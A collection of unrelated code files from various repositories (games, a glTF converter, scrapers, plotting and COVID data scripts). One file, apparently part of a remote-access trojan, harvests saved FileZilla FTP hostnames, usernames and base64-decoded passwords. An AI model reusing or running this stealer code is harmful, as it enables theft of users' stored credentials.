print(' line %d: pattern \'%s\' duplicate with pattern \'%s\' line %d' % (line, pat, seenPatterns[reducedPat][1], seenPatterns[reducedPat][0]), file=sys.stderr)
nbErrors += 1
else:
seenPatterns[reducedPat] = (line, pat)
if nbErrors == 0:
print('No error found')
sys.exit(0)
else:
sys.exit(1)
| 1.84375 | 2 |
gameOfLife.py | andrewKv/pythonGraphicsPrograms | 0 | 31876 | <filename>gameOfLife.py
from Graphics import *
CELL_SIZE = 20
ROWS, COLUMNS = 40, 40
class Cell:
def __init__(self, pos):
self.pos = pos
self.alive = False
self.flipNextGen = False
def switch(self):
self.alive = not self.alive
def draw(self, win):
r = Rectangle(Point(self.pos[0], self.pos[1]), Point(self.pos[0] + CELL_SIZE, self.pos[1] + CELL_SIZE))
if self.alive:
r.setFill("black")
else:
r.setFill("white")
r.draw(win)
def showEmptyGrid():
win = GraphWin("Game of Life", 500, 500)
cellGrid = []
for y in range(0, COLUMNS * CELL_SIZE, CELL_SIZE):
for x in range(0, ROWS * CELL_SIZE, CELL_SIZE):
c = Cell([x, y])
cellGrid.append(c)
c.draw(win)
return win, cellGrid
def clickToGrid(pos):
def myRound(x, base):
return int(base * round(float(x) / base))
return myRound(pos.getX(), CELL_SIZE), myRound(pos.getY(), CELL_SIZE)
def inputToGrid(win, cGrid):
placing = True
while placing:
mPos = win.getMouse()
xPos, yPos = clickToGrid(mPos)
for c in cGrid:
if c.pos == [xPos,yPos]:
c.switch()
c.draw(win)
placing = win.checkKey() != "space"
return cGrid
def getNeighbs(c, cGrid):
neighbs = 0
cPlace = cGrid.index(c)
x = c.pos[0]/CELL_SIZE
y = c.pos[1]/CELL_SIZE
squarePerRow = COLUMNS
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Ugly, try-catch?~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
if x > 0: # Left
if cGrid[cPlace - 1].alive:
neighbs += 1
if y > 0: # Top Left
if cGrid[cPlace - (squarePerRow + 1)].alive:
neighbs += 1
if y < ROWS - 1: # Bottom Left
if cGrid[cPlace + (squarePerRow - 1)].alive:
neighbs += 1
if cGrid[cPlace - squarePerRow].alive: # Top
neighbs += 1
if x < COLUMNS - 1: # Right
if cGrid[cPlace + 1].alive:
neighbs += 1
if y > 0: # Top Right
if cGrid[cPlace - (squarePerRow - 1)].alive:
neighbs += 1
if y < ROWS - 1: # Bottom Right
if cGrid[cPlace + (squarePerRow + 1)].alive:
neighbs += 1
if cGrid[cPlace + squarePerRow].alive: # Bottom
neighbs += 1
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
return neighbs
def runSimulation(win, cGrid):
while win.checkMouse() == None:
for c in cGrid: #Once through determines changes
nCount = getNeighbs(c, cGrid)
if c.alive:
if nCount < 2 or nCount > 3:
c.flipNextGen = True # Death conditions
# Else lives on
elif nCount == 3: # Birth condition
c.flipNextGen = True
time.sleep(0.05)
for c in cGrid: #Second time activates changes
if c.flipNextGen:
c.switch()
c.flipNextGen = False
c.draw(win)
def main():
# Space to stop clicking inputs
# Click anywhere to end simulation
win, grid = showEmptyGrid()
grid = inputToGrid(win, grid)
runSimulation(win, grid)
main()
| 2.640625 | 3 |
lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 0 | 32004 | <reponame>mrbartrns/programmers-algorithm<filename>lv1/hash_marathon.py
def solution(participant, completion):
answer = ''
# sort하면 시간절약이 가능
participant.sort() # [a, a, b]
completion.sort() # [a, b]
print(participant)
print(completion)
for i in range(len(completion)):
if participant[i] != completion[i]:
answer = participant[i]
break
else:
answer = participant[len(participant) - 1]
return answer
part = ['marina', 'josipa', 'nikola', 'vinko', 'filipa']
comp = ['josipa', 'filipa', 'marina', 'nikola']
print(solution(part, comp)) | 2.296875 | 2 |
python/DeepSeaScene/Convert/GLTFModel.py | akb825/DeepSea | 5 | 32132 | # Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import os
import struct
from .ModelNodeConvert import ModelNodeVertexStream, ModelNodeGeometryData, addModelType
from .SceneResourcesConvert import modelVertexAttribEnum
class Object:
pass
gltfVertexAttribEnum = {
'POSITION': modelVertexAttribEnum['Position'],
'NORMAL': modelVertexAttribEnum['Normal'],
'TANGENT': modelVertexAttribEnum['Tangent'],
'TEXCOORD_0': modelVertexAttribEnum['TexCoord0'],
'TEXCOORD`1': modelVertexAttribEnum['TexCoord1'],
'TEXCOORD`2': modelVertexAttribEnum['TexCoord2'],
'TEXCOORD`3': modelVertexAttribEnum['TexCoord3'],
'TEXCOORD`4': modelVertexAttribEnum['TexCoord4'],
'TEXCOORD`5': modelVertexAttribEnum['TexCoord5'],
'TEXCOORD`6': modelVertexAttribEnum['TexCoord6'],
'TEXCOORD`7': modelVertexAttribEnum['TexCoord7'],
'COLOR_0': modelVertexAttribEnum['Color0'],
'COLOR_1': modelVertexAttribEnum['Color1'],
'JOINTS_0': modelVertexAttribEnum['BlendIndices'],
'WEIGHTS_0': modelVertexAttribEnum['BlendWeights'],
}
gltfTypeMap = {
('SCALAR', 5120): ('X8', 'Int'),
('SCALAR', 5121): ('X8', 'UInt'),
('SCALAR', 5122): ('X16', 'Int'),
('SCALAR', 5123): ('X16', 'UInt'),
('SCALAR', 5125): ('X32', 'UInt'),
('SCALAR', 5126): ('X32', 'Float'),
('VEC2', 5120): ('X8Y8', 'Int'),
('VEC2', 5121): ('X8Y8', 'UInt'),
('VEC2', 5122): ('X16Y16', 'Int'),
('VEC2', 5123): ('X16Y16', 'UInt'),
('VEC2', 5126): ('X32Y32', 'Float'),
('VEC3', 5120): ('X8Y8Z8', 'Int'),
('VEC3', 5121): ('X8Y8Z8', 'UInt'),
('VEC3', 5122): ('X16Y16Z16', 'Int'),
('VEC3', 5123): ('X16Y16Z16', 'UInt'),
('VEC3', 5126): ('X32Y32Z32', 'Float'),
('VEC4', 5120): ('X8Y8Z8W8', 'Int'),
('VEC4', 5121): ('X8Y8Z8W8', 'UInt'),
('VEC4', 5122): ('X16Y16Z16W16', 'Int'),
('VEC4', 5123): ('X16Y16Z16W16', 'UInt'),
('VEC4', 5126): ('X32Y32Z32W32', 'Float')
}
gltfPrimitiveTypeMap = ['PointList', 'LineList', 'LineStrip', 'LineStrip', 'TriangleList',
'TriangleStrip', 'TriangleFan']
def convertGLTFModel(convertContext, path):
"""
Converts an GLTF model for use with ModelNodeConvert.
If the "name" element is provided for a mesh, it will be used for the name of the model
geometry. Otherwise, the name will be "mesh#", where # is the index of the mesh. If multiple
sets of primitives are used, the index will be appended to the name, separated with '.'.
Limitations:
- Only meshes and dependent data (accessors, buffer views, and buffers) are extracted. All other
parts of the scene are ignored, including transforms.
- Morph targets aren't supported.
- Materials aren't read, and are instead provided in the DeepSea scene configuration.
- Buffer data may either be embedded or a file path relative to the main model file. General
URIs are not supported.
"""
with open(path) as f:
try:
data = json.load(f)
except:
raise Exception('Invalid GLTF file "' + path + '".')
parentDir = os.path.dirname(path)
try:
# Read the buffers.
buffers = []
bufferInfos = data['buffers']
dataPrefix = 'data:application/octet-stream;base64,'
try:
for bufferInfo in bufferInfos:
uri = bufferInfo['uri']
if uri.startswith(dataPrefix):
try:
buffers.append(base64.b64decode(uri[len(dataPrefix):]))
except:
raise Exception('Invalid buffer data for GLTF file "' + path + '".')
else:
with open(os.path.join(parentDir, uri), 'rb') as f:
buffers.append(f.read())
except (TypeError, ValueError):
raise Exception('Buffers must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Buffer doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the buffer views.
bufferViews = []
bufferViewInfos = data['bufferViews']
try:
for bufferViewInfo in bufferViewInfos:
bufferView = Object()
try:
bufferData = buffers[bufferViewInfo['buffer']]
except (IndexError, TypeError):
raise Exception('Invalid buffer index for GLTF file "' + path + '".')
offset = bufferViewInfo['byteOffset']
length = bufferViewInfo['byteLength']
try:
bufferView.buffer = bufferData[offset:offset + length]
except (IndexError, TypeError):
raise Exception('Invalid buffer view range for GLTF file "' + path + '".')
bufferViews.append(bufferView)
except (TypeError, ValueError):
raise Exception(
'Buffer views must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Buffer view doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the accessors.
accessors = []
accessorInfos = data['accessors']
try:
for accessorInfo in accessorInfos:
accessor = Object()
try:
accessor.bufferView = bufferViews[accessorInfo['bufferView']]
except (IndexError, TypeError):
raise Exception('Invalid buffer view index for GLTF file "' + path + '".')
gltfType = accessorInfo['type']
componentType = accessorInfo['componentType']
try:
accessorType, decorator = gltfTypeMap[(gltfType, componentType)]
except (KeyError, TypeError):
raise Exception('Invalid accessor type (' + str(gltfType) + ', ' +
str(componentType) + ') for GLTF file "' + path + '".')
accessor.type = accessorType
accessor.decorator = decorator
accessor.count = accessorInfo['count']
accessors.append(accessor)
except (TypeError, ValueError):
raise Exception('Accessors must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Accessor doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the meshes.
meshes = []
meshInfos = data['meshes']
try:
meshIndex = 0
for meshInfo in meshInfos:
meshName = meshInfo.get('name', 'mesh' + str(meshIndex))
primitiveInfos = meshInfo['primitives']
try:
primitiveIndex = 0
for primitiveInfo in primitiveInfos:
mesh = Object()
mesh.attributes = []
mesh.name = meshName
if len(primitiveInfos) > 1:
mesh.name += '.' + str(primitiveIndex)
primitiveIndex += 1
try:
for attrib, index in primitiveInfo['attributes'].items():
if attrib not in gltfVertexAttribEnum:
raise Exception('Unsupported attribute "' + str(attrib) +
'" for GLTF file "' + path + '".')
try:
mesh.attributes.append((gltfVertexAttribEnum[attrib],
accessors[index]))
except (IndexError, TypeError):
raise Exception('Invalid accessor index for GLTF file "' +
path + '".')
except (TypeError, ValueError):
raise Exception(
'Mesh primitives attributes must be an object containing attribute '
'mappings for GLTF file "' + path + '".')
if 'indices' in primitiveInfo:
try:
mesh.indices = accessors[primitiveInfo['indices']]
except (IndexError, TypeError):
raise Exception(
'Invalid accessor index for GLTF file "' + path + '".')
else:
mesh.indices = None
mode = primitiveInfo.get('mode', 4)
try:
mesh.primitiveType = gltfPrimitiveTypeMap[mode]
except (IndexError, TypeError):
raise Exception('Unsupported primitive mode for GLTF file "' + path + '".')
meshes.append(mesh)
except (TypeError, ValueError):
raise Exception(
'Mesh primitives must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Mesh primitives doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
meshIndex += 1
except (TypeError, ValueError):
raise Exception('Meshes must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Mesh doesn\'t contain element "' + str(e) + '" for GLTF file "' +
path + '".')
except (TypeError, ValueError):
raise Exception('Root value in GLTF file "' + path + '" must be an object.')
except KeyError as e:
raise Exception('GLTF file "' + path + '" doesn\'t contain element "' + str(e) + '".')
# Convert meshes to geometry list. GLTF uses separate vertex streams rather than interleved
# vertices, so the index buffer will need to be separate for each. This will have some
# data duplication during processing, but isn't expected to be a large amount in practice.
geometry = []
for mesh in meshes:
if mesh.indices:
indexData = mesh.indices.bufferView.buffer
if mesh.indices.type == 'X16':
indexSize = 2
elif mesh.indices.type == 'X32':
indexSize = 4
else:
raise Exception('Unsupported index type "' + mesh.indices.type +
'" for GLTF file "' + path + '".')
else:
indexData = None
indexSize = 0
vertexStreams = []
for attrib, accessor in mesh.attributes:
vertexFormat = [(attrib, accessor.type, accessor.decorator)]
vertexStreams.append(ModelNodeVertexStream(vertexFormat, accessor.bufferView.buffer,
indexSize, indexData))
geometry.append(ModelNodeGeometryData(mesh.name, vertexStreams, mesh.primitiveType))
return geometry
def registerGLTFModelType(convertContext):
"""
Registers the GLTF model type under the name "gltf".
"""
addModelType(convertContext, 'gltf', convertGLTFModel)
| 1.304688 | 1 |
book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | 0 | 32260 | <gh_stars>0
from bs4 import BeautifulSoup
from selenium import webdriver
import requests
import time
class Film(object):
"""docstring for film"""
def __init__(self):
self.title = ""
self.rank = ""
self.year_of_production = ""
self.link = ""
def create_phantom_driver():
driver = webdriver.PhantomJS(executable_path = r'C:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
return driver
def get_popular_film_list(url):
driver = create_phantom_driver()
# url = 'http://www.imdb.com/chart/top?ref_=nv_mv_250_6'
# download html
driver.get(url)
# print driver.page_source
# create soup
soup = BeautifulSoup(driver.page_source,'lxml')
# soup = BeautifulSoup(open('imdb.html'),'lxml')
# search
table = soup.find('table',class_='chart')
film_list =[]
for td in table.find_all('td',class_='titleColumn'):
a = td.find('a')
# print a['href']
new_film = Film()
full_des = td.text.strip().replace('\n','')
# print full_des
title = full_des.split('(')[0]
# print title
year = full_des.split('(')[1][:4]
# print year
start_rank = full_des.find(')')
end_rank = full_des.find('(',start_rank,len(full_des))
rank = full_des[start_rank+1:end_rank]
# print rank
new_film.rank = rank
new_film.title = title
new_film.year_of_production = year
new_film.link = a['href'].strip()
film_list.append(new_film)
driver.quit()
for film in film_list:
print film.title
print film.rank
print film.year_of_production
print film.link
print "\n"
return film_list
# when ever we have the film list
def poster_scrap(film_list):
driver = create_phantom_driver()
for film in film_list:
url = 'http://www.imdb.com' + film.link
print film.title
driver.get(url)
soup = BeautifulSoup(driver.page_source, 'lxml')
div = soup.find('div', class_='poster')
# find the link lead to poster image
a = div.find('a')
# link to download poster image
poster_url = 'http://www.imdb.com' + a['href']
print poster_url
driver.get(poster_url)
soup = BeautifulSoup(driver.page_source, 'lxml')
# print soup.prettify()
divs = soup.find_all('div',class_='pswp__zoom-wrap')
try:
imgs = divs[1].find_all('img')
download_link = imgs[1]['src']
print download_link
except Exception, e:
imgs = divs[0].find_all('img')
download_link = imgs[1]['src']
print download_link
f = open('{0}.jpg'.format(film.title.encode('utf8').replace(':','')),'wb')
f.write(requests.get(download_link).content)
# time.sleep(2)
f.close()
driver.quit()
# url for current popular and hot film
url = 'http://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm_7'
# get_popular_film_list(url)
poster_scrap(get_popular_film_list(url))
| 1.90625 | 2 |
Libraries_Benchmark/Real_dataset_experiments/code/Plotting/plots_code_real_dataset_var.py | gonzalo-munillag/Benchmarking_Differential_Privacy_Analytics_Libraries | 0 | 32388 | import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
import numpy as np
import pandas as pd
import csv
from matplotlib.lines import Line2D
epsilon = pd.read_pickle('epsilon.pkl')
def plots_with_sizes(result_folder, query, attribute):
if attribute == 'age':
d = 1
if attribute == 'hrs':
d = 2
if attribute == 'absences':
d = 3
if attribute == 'grade':
d = 4
################# Std of scaled error ######################
diffprivlib_std = pd.read_csv(result_folder + "\\diffprivlib\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
smartnoise_std = pd.read_csv(result_folder + "\\smartnoise\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
pydp_std = pd.read_csv(result_folder + "\\pydp\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
diffpriv_std = pd.read_csv(result_folder + "\\diffpriv_simple\\{q}\\results_dataset_{d}\\std_scaled_error\\std_scaled_error.csv".format(q=query,d=d), header=None)
#chorus_std = pd.read_csv(result_folder + "\\chorus_real_dataset_results\\{q}\\results_dataset_{d}\\std_scaled_error\\DP_std_scaled_error.csv".format(q=query,d=d), header=None)
################# Mean relative error ######################
diffprivlib_relative = pd.read_csv(result_folder + "\\diffprivlib\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
smartnoise_relative = pd.read_csv(result_folder + "\\smartnoise\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
pydp_relative = pd.read_csv(result_folder + "\\pydp\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
diffpriv_relative = pd.read_csv(result_folder + "\\diffpriv_simple\\{q}\\results_dataset_{d}\\mean_relative_error\\mean_relative_error.csv".format(q=query,d=d), header=None)
#chorus_relative = pd.read_csv(result_folder + "\\chorus_real_dataset_results\\{q}\\results_dataset_{d}\\mean_relative_error\\DP_mean_relative_error.csv".format(q=query,d=d), header=None)
################ labels ######################
x1 = [0.01,0,0,0,0,0,0,0,0, 0.1 ,0,0,0,0,0, 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0, 0,0, 0,0, 1, 0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,100]
x2 = [0.01,0,0,0,0,0,0,0,0, 0.1 ,0,0,0,0,0, 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0, 0,0, 0,0, 1, 0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,100]
################ Plotting ######################
gs1 = gs.GridSpec(nrows=1, ncols=2)
gs1.update(wspace=0.3, hspace=0.05) # set the spacing between axes.
figure = plt.gcf() # get current figure
figure.clf()
###### Size plot #######
ax1 = plt.subplot(gs1[0,0])
ax1.plot(x1, diffprivlib_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, diffprivlib_std, color = 'xkcd:orangish red')
ax1.plot(x1, smartnoise_std[1:], "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, smartnoise_std[1:], color = 'xkcd:moss green')
ax1.plot(x1, pydp_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, pydp_std, color = 'xkcd:soft blue')
ax1.plot(x1, diffpriv_std, "o", markeredgecolor='k', mfc='none')
ax1.plot(epsilon, diffpriv_std, color = 'xkcd:aquamarine')
#ax1.plot(x1, chorus_std, "o", markeredgecolor='k', mfc='none')
#ax1.plot(epsilon, chorus_std, color = 'xkcd:purple')
ax1.set_xlabel('ε', fontsize = 12)
ax1.set_ylabel('Sample Std of the \n Absolute Scaled Error', fontsize = 16)
################# MEAN RELATIVE ERROR ############################
ax2 = plt.subplot(gs1[0,1])
ax2.plot(x2, abs(diffprivlib_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(diffprivlib_relative)*100, color = 'xkcd:orangish red', label="diffprivlib, IBM (Python)")
ax2.plot(x2, abs(smartnoise_relative[1:])*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(smartnoise_relative[1:])*100, color = 'xkcd:moss green', label="SmartNoise, Microsoft (Python wrapper over Rust)")
ax2.plot(x2, abs(pydp_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(pydp_relative)*100, color = 'xkcd:soft blue', label="PyDP (Python wrapper over Google DP C++)")
ax2.plot(x2, abs(diffpriv_relative)*100, "o", markeredgecolor='k', mfc='none')
ax2.plot(epsilon, abs(diffpriv_relative)*100, color = 'xkcd:aquamarine', label="diffpriv, <NAME>, et al. (R)")
#ax2.plot(x2, abs(chorus_relative)*100, "o", markeredgecolor='k', mfc='none')
#ax2.plot(epsilon, abs(chorus_relative)*100, color = 'xkcd:purple', label="<NAME>ear et al (Scala)")
ax2.set_xlabel('ε', fontsize = 12)
ax2.set_ylabel('Sample Mean of the \n Relative Error [%]', fontsize = 16)
#ax1.legend(prop={'size': 19}, loc="lower center", bbox_to_anchor=(1.00, -0.02), frameon=False, ncol=4, handletextpad=0.2, handlelength=1, columnspacing=0.5)
#ax2.legend(prop={'size': 18}, loc="lower center", bbox_to_anchor=(-0.13, -0.30), frameon=False, ncol=2, handletextpad=0.2, handlelength=1, columnspacing=0.5)
figure.subplots_adjust(bottom=0.30)
#legend_elements_1 = [Line2D([1], [1], color='xkcd:orangish red', label='diffprivlib, IBM (Python)'), Line2D([1], [1], color='xkcd:soft blue', label='PyDP (Python wrapper over Google DP C++)'), Line2D([1], [1], color='xkcd:moss green', label='SmartNoise, Microsoft (Python wrapper over Rust)')]
#figure.legend(prop={'size': 18.5},handles=legend_elements_1, loc="lower center", bbox_to_anchor=(0.33, -0.02), frameon=False, ncol=1, handletextpad=0.2, handlelength=1)
#legend_elements_2 = [ Line2D([1], [1], color='xkcd:aquamarine', label='diffpriv, <NAME>, et al. (R)'), Line2D([1], [1], color='xkcd:purple', label='<NAME>ear et al (Scala)')]
#legend_elements_2 = [ Line2D([1], [1], color='xkcd:aquamarine', label='diffpriv, <NAME>, et al. (R)')]
#figure.legend(prop={'size': 18.5},handles=legend_elements_2, loc="lower center", bbox_to_anchor=(0.77, 0.1), frameon=False, ncol=1, handletextpad=0.2, handlelength=1)
if query == 'count':
ax1.set_ylim(10**-8, 10**3)
figure.suptitle('Count Query', fontsize=19)
if query == 'sum':
ax1.set_ylim(10**-8, 10**8)
figure.suptitle('Sum Query', fontsize=19)
if query == 'mean':
ax1.set_ylim(10**-12, 10**2)
figure.suptitle('Mean Query', fontsize=19)
if query == 'var':
ax1.set_ylim(10**-8, 10**4)
figure.suptitle('Variance Query', fontsize=19)
ax1.tick_params(axis='both', which='major', labelsize=16)
ax2.tick_params(axis='both', which='major', labelsize=16)
ax1.loglog()
ax2.set_xscale('log')
plt.show()
plots_with_sizes(result_folder="E:\\MS_Thesis\\publication_stuff\\results_Jan_2021\\real_dataset_micro\\22April2021", query="var", attribute='grade') | 1.59375 | 2 |
Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 375 | 32516 | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server | 1.484375 | 1 |
covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 0 | 32644 | <reponame>gunnarsundberg/covid-tracker<filename>covid_data/daily_updates/update_outbreak.py
import os
import io
import math
import requests
from datetime import datetime, date, timedelta
import pandas as pd
from covid_data.models import State, County, Outbreak, OutbreakCumulative
from covid_data.utilities import get_datetime_from_str, api_request_from_str
# Some functions only work for specific region types (state, county etc) because the data sources used differ
"""
# Gets all state outbreak data and returns it as json object
def get_outbreak_data_by_state(outbreak_state):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code
print(outbreak_str)
return api_request_from_str(outbreak_str)
# Gets all outbreak data for a specific state on a specified date and returns it as a json object
def get_outbreak_data_by_state_and_date(outbreak_state, outbreak_date):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code + "&date=" + str(outbreak_date).replace("-","")
return api_request_from_str(outbreak_str)
"""
def update_state_outbreak():
state_outbreak_csv_url = "https://raw.githubusercontent.com/COVID19Tracking/covid-tracking-data/master/data/states_daily_4pm_et.csv"
state_outbreak_csv = requests.get(state_outbreak_csv_url).content
outbreak_data = pd.read_csv(io.StringIO(state_outbreak_csv.decode('utf-8')))
for index, row in outbreak_data.iterrows():
# If state is not a region we track, move to next iteration
try:
record_state = State.objects.get(code=row['state'])
except:
continue
record_date = get_datetime_from_str(str(row['date']))
# If cases are greater than 99, update or create outbreak record
if row['positive'] > 99:
daily_cases = row['positiveIncrease']
daily_total_tested = row['totalTestResultsIncrease']
daily_deaths = row['deathIncrease']
if not math.isnan(row['negativeIncrease']):
daily_negative_tests = row['negativeIncrease']
else:
daily_negative_tests = None
if not math.isnan(row['hospitalizedIncrease']):
daily_admitted_to_hospital = row['hospitalizedIncrease']
else:
daily_admitted_to_hospital = None
if not math.isnan(row['hospitalizedCurrently']):
daily_hospitalized = row['hospitalizedCurrently']
else:
daily_hospitalized = None
if not math.isnan(row['inIcuCurrently']):
daily_in_icu = row['inIcuCurrently']
else:
daily_in_icu = None
new_values = {'region': record_state, 'date': record_date, 'cases': daily_cases, 'negative_tests': daily_negative_tests, 'total_tested': daily_total_tested, 'deaths': daily_deaths, 'admitted_to_hospital': daily_admitted_to_hospital, 'hospitalized': daily_hospitalized, 'in_icu': daily_in_icu}
state_outbreak, created = Outbreak.objects.update_or_create(region=record_state, date=record_date, defaults=new_values)
state_outbreak.save()
cumulative_cases = row['positive']
cumulative_total_tested = row['totalTestResults']
if not math.isnan(row['negative']):
cumulative_negative_tests = row['negative']
else:
cumulative_negative_tests = None
if not math.isnan(row['death']):
cumulative_deaths = row['death']
else:
cumulative_deaths = None
if not math.isnan(row['hospitalizedCumulative']):
cumulative_hospitalized = row['hospitalizedCumulative']
else:
cumulative_hospitalized = None
if not math.isnan(row['inIcuCumulative']):
cumulative_in_icu = row['inIcuCumulative']
else:
cumulative_in_icu = None
state_outbreak_cumulative, created = OutbreakCumulative.objects.update_or_create(
region=record_state,
date=record_date,
defaults={
'cases': cumulative_cases,
'negative_tests': cumulative_negative_tests,
'total_tested': cumulative_total_tested,
'deaths': cumulative_deaths,
'hospitalized': cumulative_hospitalized,
'in_icu': cumulative_in_icu
}
)
state_outbreak_cumulative.save()
def update_all_state_outbreaks(date_to_update):
states = State.objects.all()
for state in states:
outbreak_json = get_outbreak_data_by_state_and_date(state, date_to_update)
update_state_outbreak(outbreak_json)
def update_county_outbreak():
url = "https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv"
county_data = requests.get(url).content
county_data_dataframe = pd.read_csv(io.StringIO(county_data.decode('utf-8')), dtype={'fips': 'object'})
for index, row in county_data_dataframe.iterrows():
cases = row['cases']
if cases > 24:
record_date = datetime.strptime(row['date'], '%Y-%m-%d').date()
county_fips = str(row['fips'])
deaths = row['deaths']
try:
county = County.objects.get(fips_code=county_fips)
outbreak_cumulative_record, created = OutbreakCumulative.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
outbreak_cumulative_record.save()
except:
continue
try:
county = County.objects.get(fips_code=county_fips)
day_before = record_date - timedelta(days=1)
day_before_df = county_data_dataframe[(county_data_dataframe.fips == county_fips) & (county_data_dataframe.date == str(day_before))]
index = day_before_df.index[0]
cases = cases - day_before_df['cases'][index]
if cases < 0:
cases = 0
deaths = deaths - day_before_df['deaths'][index]
outbreak_record, created = Outbreak.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
except:
continue
| 1.820313 | 2 |
core/src/trezor/messages/TxAck.py | Kayuii/trezor-crypto | 0 | 32772 | <reponame>Kayuii/trezor-crypto
# Automatically generated by pb2py
# fmt: off
import protobuf as p
from .TransactionType import TransactionType
class TxAck(p.MessageType):
MESSAGE_WIRE_TYPE = 22
def __init__(
self,
tx: TransactionType = None,
) -> None:
self.tx = tx
@classmethod
def get_fields(cls):
return {
1: ('tx', TransactionType, 0),
}
| 1.164063 | 1 |
Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | 31 | 32900 | <reponame>MichaelRW/Python-for-Geeks<filename>Chapter11/grades_ms/grades/grades_svc/admin.py
from django.contrib import admin
from .models import Grade
admin.site.register(Grade)
| 0.921875 | 1 |
django_rest_auth_embedded/tests/__init__.py | Volkova-Natalia/django_rest_auth_embedded | 0 | 33028 | <reponame>Volkova-Natalia/django_rest_auth_embedded
from .models import *
from .urls import *
from .views import *
from .integration import *
| 0.5625 | 1 |
hanlp/utils/__init__.py | antfootAlex/HanLP | 27,208 | 33156 | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-08-24 22:12
from . import rules
def ls_resource_in_module(root) -> dict:
res = dict()
for k, v in root.__dict__.items():
if k.startswith('_') or v == root:
continue
if isinstance(v, str):
if v.startswith('http') and not v.endswith('/') and not v.endswith('#') and not v.startswith('_'):
res[k] = v
elif type(v).__name__ == 'module':
res.update(ls_resource_in_module(v))
if 'ALL' in root.__dict__ and isinstance(root.__dict__['ALL'], dict):
root.__dict__['ALL'].update(res)
return res
| 1.976563 | 2 |
examples/main_simulation_lemon_graph.py | KaterynaMelnyk/GraphKKE | 1 | 33284 | import os
import argparse
import numpy as np
import scipy
import imageio
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
